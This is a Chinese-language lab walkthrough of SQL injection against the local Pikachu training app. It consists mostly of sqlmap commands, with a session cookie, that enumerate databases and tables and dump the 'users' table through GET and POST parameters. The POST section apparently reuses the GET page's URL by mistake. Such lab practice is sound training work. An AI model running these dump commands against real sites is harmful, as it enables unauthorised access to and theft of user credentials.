一、字符型注入(get)
(1)随便输入name,获取url:
因pikachu登录需要用户名及密码,所以查询网页cookie绕过:
(2)使用sqlmap查找该网站数据库:
python sqlmap.py -u "http://127.0.0.1:8083/vul/sqli/sqli_str.php?name=123&submit=查询" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; security=low" --dbs --batch
获取到pikachu和information_schema两个数据库
(3)对可疑数据库pikachu查询表:
python sqlmap.py -u "http://127.0.0.1:8083/vul/sqli/sqli_str.php?name=123&submit=查询" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; security=low" -D pikachu --tables --batch
(4)对可疑表users查询dump数据:
python sqlmap.py -u "http://127.0.0.1:8083/vul/sqli/sqli_str.php?name=123&submit=查询" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; security=low" -D pikachu --tables -T users --dump --batch
成功获取用户登录信息
二、数字型注入(post)
(1)随便选一个提交,在fn+f12的网络中查看post请求的原始参数:
(2)使用sqlmap查询数据库:
/*** 在post请求的sql注入中,需要另加一个参数 --data="post请求"。 ***/
python sqlmap.py -u "http://127.0.0.1:8083/vul/sqli/sqli_str.php?name=123&submit=查询" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; security=low" --data="id=1&submit=查询" --dbs --batch
(3)查询可疑数据库的表以及可疑表中dump信息 :
python sqlmap.py -u "http://127.0.0.1:8083/vul/sqli/sqli_str.php?name=123&submit=查询" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; security=low" --data="id=1&submit=查询" -D pikachu --tables --batch
python sqlmap.py -u "http://127.0.0.1:8083/vul/sqli/sqli_str.php?name=123&submit=查询" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; security=low" --data="id=1&submit=查询" -D pikachu --tables -T users --dump --batch
成功获取用户信息